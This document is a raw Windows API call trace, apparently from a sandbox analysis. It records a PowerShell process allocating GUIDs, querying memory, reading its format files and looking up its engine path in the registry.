	[0297.062] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccf20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0297.880] VirtualQuery (in: lpAddress=0x1cbec0, lpBuffer=0x1ccd80, dwLength=0x30 | out: lpBuffer=0x1ccd80*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0297.881] CoCreateGuid (in: pguid=0x1cd650 | out: pguid=0x1cd650*(Data1=0x1c04a70e, Data2=0x76d7, Data3=0x46c6, Data4=([0]=0x86, [1]=0xcc, [2]=0xc4, [3]=0x84, [4]=0x52, [5]=0x2b, [6]=0xf3, [7]=0xab))) returned 0x0
	[0297.882] CoCreateGuid (in: pguid=0x1cd650 | out: pguid=0x1cd650*(Data1=0xca4d5428, Data2=0xc52a, Data3=0x445e, Data4=([0]=0xb5, [1]=0xc3, [2]=0x97, [3]=0x2b, [4]=0x9c, [5]=0xaa, [6]=0x8f, [7]=0x3d))) returned 0x0
	[0297.883] VirtualQuery (in: lpAddress=0x1cc070, lpBuffer=0x1ccf30, dwLength=0x30 | out: lpBuffer=0x1ccf30*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0297.884] VirtualQuery (in: lpAddress=0x1cc070, lpBuffer=0x1ccf30, dwLength=0x30 | out: lpBuffer=0x1ccf30*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0297.885] CoCreateGuid (in: pguid=0x1cd650 | out: pguid=0x1cd650*(Data1=0xa0665b63, Data2=0x8dc7, Data3=0x4e6d, Data4=([0]=0xb8, [1]=0x33, [2]=0x57, [3]=0xe4, [4]=0x42, [5]=0x18, [6]=0x93, [7]=0x7e))) returned 0x0
	[0297.888] CoCreateGuid (in: pguid=0x1cd650 | out: pguid=0x1cd650*(Data1=0x629daa59, Data2=0x3c4a, Data3=0x4712, Data4=([0]=0xba, [1]=0xb, [2]=0x3f, [3]=0x1b, [4]=0xb4, [5]=0x89, [6]=0xdd, [7]=0x8f))) returned 0x0
	[0297.888] VirtualQuery (in: lpAddress=0x1cc2c0, lpBuffer=0x1cd180, dwLength=0x30 | out: lpBuffer=0x1cd180*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0297.888] VirtualQuery (in: lpAddress=0x1cc000, lpBuffer=0x1ccec0, dwLength=0x30 | out: lpBuffer=0x1ccec0*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0297.889] VirtualQuery (in: lpAddress=0x1cc000, lpBuffer=0x1ccec0, dwLength=0x30 | out: lpBuffer=0x1ccec0*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0297.889] CoCreateGuid (in: pguid=0x1cd650 | out: pguid=0x1cd650*(Data1=0x69ccb26a, Data2=0xfad0, Data3=0x43af, Data4=([0]=0x81, [1]=0x54, [2]=0xf4, [3]=0xb9, [4]=0x71, [5]=0xcf, [6]=0x14, [7]=0x2a))) returned 0x0
	[0297.889] VirtualQuery (in: lpAddress=0x1cc2c0, lpBuffer=0x1cd180, dwLength=0x30 | out: lpBuffer=0x1cd180*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0297.889] VirtualQuery (in: lpAddress=0x1cc0e0, lpBuffer=0x1ccfa0, dwLength=0x30 | out: lpBuffer=0x1ccfa0*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0297.889] VirtualQuery (in: lpAddress=0x1cb930, lpBuffer=0x1cc7f0, dwLength=0x30 | out: lpBuffer=0x1cc7f0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0297.889] VirtualQuery (in: lpAddress=0x1cb930, lpBuffer=0x1cc7f0, dwLength=0x30 | out: lpBuffer=0x1cc7f0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0297.890] CoCreateGuid (in: pguid=0x1cd650 | out: pguid=0x1cd650*(Data1=0x3b7210a0, Data2=0xcbdc, Data3=0x45d2, Data4=([0]=0xbf, [1]=0x64, [2]=0x23, [3]=0xb, [4]=0x40, [5]=0xa7, [6]=0xab, [7]=0xc1))) returned 0x0
	[0297.890] CoCreateGuid (in: pguid=0x1cd650 | out: pguid=0x1cd650*(Data1=0xece45302, Data2=0x740d, Data3=0x4a5a, Data4=([0]=0x92, [1]=0x52, [2]=0xb3, [3]=0xff, [4]=0x62, [5]=0xf1, [6]=0x14, [7]=0x99))) returned 0x0
	[0297.890] SetErrorMode (uMode=0x1) returned 0x1
	[0297.890] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x304
	[0297.890] GetFileType (hFile=0x304) returned 0x1
	[0297.890] SetErrorMode (uMode=0x1) returned 0x1
	[0297.890] GetFileType (hFile=0x304) returned 0x1
	[0297.890] ReadFile (in: hFile=0x304, lpBuffer=0x34d6178, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd398, lpOverlapped=0x0 | out: lpBuffer=0x34d6178*, lpNumberOfBytesRead=0x1cd398*=0x1000, lpOverlapped=0x0) returned 1
	[0297.891] ReadFile (in: hFile=0x304, lpBuffer=0x34d6178, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd398, lpOverlapped=0x0 | out: lpBuffer=0x34d6178*, lpNumberOfBytesRead=0x1cd398*=0x1000, lpOverlapped=0x0) returned 1
	[0297.891] ReadFile (in: hFile=0x304, lpBuffer=0x34d6178, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd398, lpOverlapped=0x0 | out: lpBuffer=0x34d6178*, lpNumberOfBytesRead=0x1cd398*=0x1000, lpOverlapped=0x0) returned 1
	[0297.891] ReadFile (in: hFile=0x304, lpBuffer=0x34d6178, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd398, lpOverlapped=0x0 | out: lpBuffer=0x34d6178*, lpNumberOfBytesRead=0x1cd398*=0x1000, lpOverlapped=0x0) returned 1
	[0297.892] ReadFile (in: hFile=0x304, lpBuffer=0x34d6178, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd398, lpOverlapped=0x0 | out: lpBuffer=0x34d6178*, lpNumberOfBytesRead=0x1cd398*=0x1000, lpOverlapped=0x0) returned 1
	[0297.892] ReadFile (in: hFile=0x304, lpBuffer=0x34d6178, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd398, lpOverlapped=0x0 | out: lpBuffer=0x34d6178*, lpNumberOfBytesRead=0x1cd398*=0x1000, lpOverlapped=0x0) returned 1
	[0297.892] ReadFile (in: hFile=0x304, lpBuffer=0x34d6178, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd398, lpOverlapped=0x0 | out: lpBuffer=0x34d6178*, lpNumberOfBytesRead=0x1cd398*=0x1000, lpOverlapped=0x0) returned 1
	[0297.892] ReadFile (in: hFile=0x304, lpBuffer=0x34d6178, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd398, lpOverlapped=0x0 | out: lpBuffer=0x34d6178*, lpNumberOfBytesRead=0x1cd398*=0x1000, lpOverlapped=0x0) returned 1
	[0297.893] ReadFile (in: hFile=0x304, lpBuffer=0x34d6178, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd398, lpOverlapped=0x0 | out: lpBuffer=0x34d6178*, lpNumberOfBytesRead=0x1cd398*=0x1000, lpOverlapped=0x0) returned 1
	[0297.893] ReadFile (in: hFile=0x304, lpBuffer=0x34d6178, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd398, lpOverlapped=0x0 | out: lpBuffer=0x34d6178*, lpNumberOfBytesRead=0x1cd398*=0x1000, lpOverlapped=0x0) returned 1
	[0297.894] ReadFile (in: hFile=0x304, lpBuffer=0x34d6178, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd398, lpOverlapped=0x0 | out: lpBuffer=0x34d6178*, lpNumberOfBytesRead=0x1cd398*=0x1000, lpOverlapped=0x0) returned 1
	[0297.894] ReadFile (in: hFile=0x304, lpBuffer=0x34d6178, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd398, lpOverlapped=0x0 | out: lpBuffer=0x34d6178*, lpNumberOfBytesRead=0x1cd398*=0x1000, lpOverlapped=0x0) returned 1
	[0297.894] ReadFile (in: hFile=0x304, lpBuffer=0x34d6178, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd398, lpOverlapped=0x0 | out: lpBuffer=0x34d6178*, lpNumberOfBytesRead=0x1cd398*=0x1000, lpOverlapped=0x0) returned 1
	[0297.894] ReadFile (in: hFile=0x304, lpBuffer=0x34d6178, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd398, lpOverlapped=0x0 | out: lpBuffer=0x34d6178*, lpNumberOfBytesRead=0x1cd398*=0x1000, lpOverlapped=0x0) returned 1
	[0297.895] ReadFile (in: hFile=0x304, lpBuffer=0x34d6178, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd398, lpOverlapped=0x0 | out: lpBuffer=0x34d6178*, lpNumberOfBytesRead=0x1cd398*=0x1000, lpOverlapped=0x0) returned 1
	[0297.895] ReadFile (in: hFile=0x304, lpBuffer=0x34d6178, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd398, lpOverlapped=0x0 | out: lpBuffer=0x34d6178*, lpNumberOfBytesRead=0x1cd398*=0x1000, lpOverlapped=0x0) returned 1
	[0297.896] ReadFile (in: hFile=0x304, lpBuffer=0x34d6178, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd398, lpOverlapped=0x0 | out: lpBuffer=0x34d6178*, lpNumberOfBytesRead=0x1cd398*=0x1000, lpOverlapped=0x0) returned 1
	[0297.896] ReadFile (in: hFile=0x304, lpBuffer=0x34d6178, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd398, lpOverlapped=0x0 | out: lpBuffer=0x34d6178*, lpNumberOfBytesRead=0x1cd398*=0xbce, lpOverlapped=0x0) returned 1
	[0297.896] ReadFile (in: hFile=0x304, lpBuffer=0x34d58ae, nNumberOfBytesToRead=0x32, lpNumberOfBytesRead=0x1cd398, lpOverlapped=0x0 | out: lpBuffer=0x34d58ae*, lpNumberOfBytesRead=0x1cd398*=0x0, lpOverlapped=0x0) returned 1
	[0297.896] ReadFile (in: hFile=0x304, lpBuffer=0x34d6178, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd398, lpOverlapped=0x0 | out: lpBuffer=0x34d6178*, lpNumberOfBytesRead=0x1cd398*=0x0, lpOverlapped=0x0) returned 1
	[0297.896] CloseHandle (hObject=0x304) returned 1
	[0297.897] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0297.897] SetErrorMode (uMode=0x1) returned 0x1
	[0297.897] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1cd340 | out: lpFileInformation=0x1cd340*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e0582f, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e0582f, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e29f95, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1
	[0297.897] SetErrorMode (uMode=0x1) returned 0x1
	[0297.897] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0297.897] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd428 | out: phkResult=0x1cd428*=0x304) returned 0x0
	[0297.897] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd3ac, lpData=0x0, lpcbData=0x1cd3a8*=0x0 | out: lpType=0x1cd3ac*=0x1, lpData=0x0, lpcbData=0x1cd3a8*=0x56) returned 0x0
	[0297.897] CoTaskMemAlloc (cb=0x5a) returned 0x2df060
	[0297.897] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd37c, lpData=0x2df060, lpcbData=0x1cd378*=0x56 | out: lpType=0x1cd37c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1cd378*=0x56) returned 0x0
	[0297.898] CoTaskMemFree (pv=0x2df060) 
	[0297.898] RegCloseKey (hKey=0x304) returned 0x0
	[0297.898] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0297.898] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccf20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0298.564] CoCreateGuid (in: pguid=0x1cd650 | out: pguid=0x1cd650*(Data1=0xfa4f1496, Data2=0xdf0, Data3=0x4485, Data4=([0]=0x9a, [1]=0xca, [2]=0x81, [3]=0xb7, [4]=0x43, [5]=0x94, [6]=0xe4, [7]=0x5d))) returned 0x0
	[0298.564] CoCreateGuid (in: pguid=0x1cd650 | out: pguid=0x1cd650*(Data1=0x85b7e962, Data2=0xb417, Data3=0x435c, Data4=([0]=0xa1, [1]=0x2f, [2]=0x40, [3]=0x87, [4]=0x8b, [5]=0xfe, [6]=0x84, [7]=0xad))) returned 0x0
	[0298.565] CoCreateGuid (in: pguid=0x1cd650 | out: pguid=0x1cd650*(Data1=0x2ab4f634, Data2=0x50ae, Data3=0x4758, Data4=([0]=0x9d, [1]=0x19, [2]=0xf, [3]=0x6d, [4]=0xf7, [5]=0x54, [6]=0x67, [7]=0x22))) returned 0x0
	[0298.565] CoCreateGuid (in: pguid=0x1cd650 | out: pguid=0x1cd650*(Data1=0x525c7e, Data2=0x4ce, Data3=0x4616, Data4=([0]=0x94, [1]=0xb9, [2]=0x23, [3]=0xb6, [4]=0xb6, [5]=0xd8, [6]=0x80, [7]=0xc5))) returned 0x0
	[0298.565] CoCreateGuid (in: pguid=0x1cd650 | out: pguid=0x1cd650*(Data1=0xaf20358b, Data2=0xfe1d, Data3=0x4738, Data4=([0]=0xaf, [1]=0x3a, [2]=0x11, [3]=0x7a, [4]=0x9d, [5]=0x46, [6]=0xf2, [7]=0x5c))) returned 0x0
	[0298.565] CoCreateGuid (in: pguid=0x1cd650 | out: pguid=0x1cd650*(Data1=0x8e915c7e, Data2=0xe558, Data3=0x455a, Data4=([0]=0xb7, [1]=0x1, [2]=0x7e, [3]=0x83, [4]=0x3, [5]=0x63, [6]=0x75, [7]=0x13))) returned 0x0
	[0298.565] VirtualQuery (in: lpAddress=0x1cc000, lpBuffer=0x1ccec0, dwLength=0x30 | out: lpBuffer=0x1ccec0*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0298.565] CoCreateGuid (in: pguid=0x1cd650 | out: pguid=0x1cd650*(Data1=0x2c07ce6e, Data2=0x6b2, Data3=0x4a7b, Data4=([0]=0x9e, [1]=0xc6, [2]=0x3b, [3]=0xa2, [4]=0xb8, [5]=0x9c, [6]=0x70, [7]=0x66))) returned 0x0
	[0298.565] VirtualQuery (in: lpAddress=0x1cc000, lpBuffer=0x1ccec0, dwLength=0x30 | out: lpBuffer=0x1ccec0*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0298.566] VirtualQuery (in: lpAddress=0x1cc000, lpBuffer=0x1ccec0, dwLength=0x30 | out: lpBuffer=0x1ccec0*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0298.566] CoCreateGuid (in: pguid=0x1cd650 | out: pguid=0x1cd650*(Data1=0x7797c316, Data2=0x4538, Data3=0x40b6, Data4=([0]=0x82, [1]=0xb8, [2]=0x94, [3]=0x82, [4]=0xca, [5]=0x69, [6]=0x95, [7]=0x64))) returned 0x0
	[0298.566] CoCreateGuid (in: pguid=0x1cd650 | out: pguid=0x1cd650*(Data1=0xa8ea7edf, Data2=0x668c, Data3=0x4d7b, Data4=([0]=0xa2, [1]=0xbd, [2]=0x9a, [3]=0x15, [4]=0x2, [5]=0x9a, [6]=0xf5, [7]=0x3))) returned 0x0
	[0298.566] CoCreateGuid (in: pguid=0x1cd650 | out: pguid=0x1cd650*(Data1=0x478dcb9b, Data2=0xd77e, Data3=0x449c, Data4=([0]=0x9c, [1]=0xbe, [2]=0x52, [3]=0xf9, [4]=0xe9, [5]=0xa7, [6]=0x25, [7]=0xeb))) returned 0x0
	[0298.566] CoCreateGuid (in: pguid=0x1cd650 | out: pguid=0x1cd650*(Data1=0x55090e3e, Data2=0x7914, Data3=0x4900, Data4=([0]=0x9d, [1]=0xad, [2]=0xc2, [3]=0x4b, [4]=0x9e, [5]=0xde, [6]=0xd, [7]=0x79))) returned 0x0
	[0298.566] VirtualQuery (in: lpAddress=0x1cc000, lpBuffer=0x1ccec0, dwLength=0x30 | out: lpBuffer=0x1ccec0*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0298.566] CoCreateGuid (in: pguid=0x1cd650 | out: pguid=0x1cd650*(Data1=0x4de5cdc2, Data2=0x7435, Data3=0x44b1, Data4=([0]=0xad, [1]=0x5d, [2]=0xc3, [3]=0x57, [4]=0xce, [5]=0xb1, [6]=0xff, [7]=0xc1))) returned 0x0
	[0298.566] VirtualQuery (in: lpAddress=0x1cc000, lpBuffer=0x1ccec0, dwLength=0x30 | out: lpBuffer=0x1ccec0*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0298.567] VirtualQuery (in: lpAddress=0x1cc000, lpBuffer=0x1ccec0, dwLength=0x30 | out: lpBuffer=0x1ccec0*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0298.567] VirtualQuery (in: lpAddress=0x1cc000, lpBuffer=0x1ccec0, dwLength=0x30 | out: lpBuffer=0x1ccec0*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0298.567] VirtualQuery (in: lpAddress=0x1cc000, lpBuffer=0x1ccec0, dwLength=0x30 | out: lpBuffer=0x1ccec0*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0298.567] VirtualQuery (in: lpAddress=0x1cc000, lpBuffer=0x1ccec0, dwLength=0x30 | out: lpBuffer=0x1ccec0*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0298.567] CoCreateGuid (in: pguid=0x1cd650 | out: pguid=0x1cd650*(Data1=0xfedae270, Data2=0xa94a, Data3=0x4ebe, Data4=([0]=0xa4, [1]=0x7e, [2]=0x7e, [3]=0x12, [4]=0xf8, [5]=0xba, [6]=0xd5, [7]=0x91))) returned 0x0
	[0298.567] CoCreateGuid (in: pguid=0x1cd650 | out: pguid=0x1cd650*(Data1=0x1f03cb06, Data2=0xbf83, Data3=0x4b66, Data4=([0]=0xb3, [1]=0x7d, [2]=0xf5, [3]=0xcd, [4]=0xa9, [5]=0xfd, [6]=0x4, [7]=0xb4))) returned 0x0
	[0298.567] CoCreateGuid (in: pguid=0x1cd650 | out: pguid=0x1cd650*(Data1=0xaafdc4b1, Data2=0x66da, Data3=0x4fa5, Data4=([0]=0x86, [1]=0xc8, [2]=0x4, [3]=0x41, [4]=0x14, [5]=0x12, [6]=0x52, [7]=0xc5))) returned 0x0
	[0298.568] CoCreateGuid (in: pguid=0x1cd650 | out: pguid=0x1cd650*(Data1=0xad71248e, Data2=0x7ced, Data3=0x490f, Data4=([0]=0xb6, [1]=0x94, [2]=0x60, [3]=0x6b, [4]=0xf0, [5]=0x9c, [6]=0x7f, [7]=0x2))) returned 0x0
	[0298.568] CoCreateGuid (in: pguid=0x1cd650 | out: pguid=0x1cd650*(Data1=0x9147e9a8, Data2=0xa12d, Data3=0x450e, Data4=([0]=0x99, [1]=0xfc, [2]=0x40, [3]=0xe9, [4]=0x11, [5]=0x46, [6]=0xa9, [7]=0x3d))) returned 0x0
	[0298.568] VirtualQuery (in: lpAddress=0x1cc2c0, lpBuffer=0x1cd180, dwLength=0x30 | out: lpBuffer=0x1cd180*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0298.568] CoCreateGuid (in: pguid=0x1cd650 | out: pguid=0x1cd650*(Data1=0x2a46db04, Data2=0x656e, Data3=0x4b69, Data4=([0]=0x92, [1]=0xdd, [2]=0xa, [3]=0xaf, [4]=0xd2, [5]=0x77, [6]=0x85, [7]=0xfd))) returned 0x0
	[0298.568] CoCreateGuid (in: pguid=0x1cd650 | out: pguid=0x1cd650*(Data1=0xe6c7cc9, Data2=0x8abb, Data3=0x4c66, Data4=([0]=0x9b, [1]=0x36, [2]=0x42, [3]=0x2a, [4]=0xff, [5]=0x41, [6]=0xa4, [7]=0xe5))) returned 0x0
	[0298.568] CoCreateGuid (in: pguid=0x1cd650 | out: pguid=0x1cd650*(Data1=0x7b1a6c9b, Data2=0x3482, Data3=0x423a, Data4=([0]=0x8c, [1]=0xcf, [2]=0x34, [3]=0xfe, [4]=0xf7, [5]=0xc5, [6]=0xf7, [7]=0xfb))) returned 0x0
	[0298.568] CoCreateGuid (in: pguid=0x1cd650 | out: pguid=0x1cd650*(Data1=0x88bcb1ba, Data2=0x80d9, Data3=0x499d, Data4=([0]=0xab, [1]=0x47, [2]=0xe3, [3]=0xb7, [4]=0xfc, [5]=0xf6, [6]=0x6b, [7]=0x31))) returned 0x0
	[0298.568] CoCreateGuid (in: pguid=0x1cd650 | out: pguid=0x1cd650*(Data1=0x1df7d25f, Data2=0xe175, Data3=0x4764, Data4=([0]=0x8e, [1]=0xbf, [2]=0xa3, [3]=0xea, [4]=0xfa, [5]=0x70, [6]=0x4c, [7]=0x86))) returned 0x0
	[0298.569] CoCreateGuid (in: pguid=0x1cd650 | out: pguid=0x1cd650*(Data1=0x425efe79, Data2=0x8adc, Data3=0x4897, Data4=([0]=0x80, [1]=0xe, [2]=0x3c, [3]=0xd, [4]=0x69, [5]=0xd0, [6]=0x85, [7]=0x28))) returned 0x0
	[0298.569] CoCreateGuid (in: pguid=0x1cd650 | out: pguid=0x1cd650*(Data1=0xe7c91f93, Data2=0x89d, Data3=0x4a28, Data4=([0]=0xab, [1]=0xc, [2]=0x9e, [3]=0xb9, [4]=0x7f, [5]=0xac, [6]=0x9e, [7]=0x6c))) returned 0x0
	[0298.569] CoCreateGuid (in: pguid=0x1cd650 | out: pguid=0x1cd650*(Data1=0x7a3960eb, Data2=0xd617, Data3=0x42f4, Data4=([0]=0xb7, [1]=0xfa, [2]=0xb8, [3]=0xe3, [4]=0x5b, [5]=0x51, [6]=0x36, [7]=0x26))) returned 0x0
	[0298.569] CoCreateGuid (in: pguid=0x1cd650 | out: pguid=0x1cd650*(Data1=0x32d3364b, Data2=0x2953, Data3=0x4dd3, Data4=([0]=0x9d, [1]=0xab, [2]=0xfd, [3]=0x85, [4]=0xc1, [5]=0x4, [6]=0x72, [7]=0xe0))) returned 0x0
	[0298.569] CoCreateGuid (in: pguid=0x1cd650 | out: pguid=0x1cd650*(Data1=0x8816ea97, Data2=0x9bc3, Data3=0x499f, Data4=([0]=0xbf, [1]=0x8a, [2]=0x47, [3]=0xa4, [4]=0xa2, [5]=0xaa, [6]=0x1a, [7]=0x2d))) returned 0x0
	[0298.569] CoCreateGuid (in: pguid=0x1cd650 | out: pguid=0x1cd650*(Data1=0xdcb05a95, Data2=0x1acf, Data3=0x4903, Data4=([0]=0xb3, [1]=0x37, [2]=0xed, [3]=0xef, [4]=0xc3, [5]=0x28, [6]=0x74, [7]=0x30))) returned 0x0
	[0298.569] CoCreateGuid (in: pguid=0x1cd650 | out: pguid=0x1cd650*(Data1=0x9459b261, Data2=0x6095, Data3=0x4171, Data4=([0]=0xa8, [1]=0x9a, [2]=0x8c, [3]=0xac, [4]=0x31, [5]=0xce, [6]=0xa5, [7]=0x38))) returned 0x0
	[0298.569] CoCreateGuid (in: pguid=0x1cd650 | out: pguid=0x1cd650*(Data1=0xf7439eb6, Data2=0xf25e, Data3=0x4240, Data4=([0]=0x81, [1]=0xb3, [2]=0x28, [3]=0x1a, [4]=0x64, [5]=0x6c, [6]=0x28, [7]=0xfd))) returned 0x0
	[0298.569] CoCreateGuid (in: pguid=0x1cd650 | out: pguid=0x1cd650*(Data1=0x9e2abc1e, Data2=0x6884, Data3=0x486a, Data4=([0]=0xad, [1]=0x66, [2]=0x47, [3]=0x79, [4]=0xcd, [5]=0xbf, [6]=0x92, [7]=0x4b))) returned 0x0
	[0298.569] CoCreateGuid (in: pguid=0x1cd650 | out: pguid=0x1cd650*(Data1=0x1fb67fb2, Data2=0xf9c5, Data3=0x4ec7, Data4=([0]=0x84, [1]=0x3f, [2]=0x2a, [3]=0xd9, [4]=0x23, [5]=0x51, [6]=0xb8, [7]=0x87))) returned 0x0
	[0298.570] CoCreateGuid (in: pguid=0x1cd650 | out: pguid=0x1cd650*(Data1=0x57317c97, Data2=0x499d, Data3=0x46ea, Data4=([0]=0x83, [1]=0xb5, [2]=0x58, [3]=0xf2, [4]=0x72, [5]=0xd, [6]=0x75, [7]=0xb9))) returned 0x0
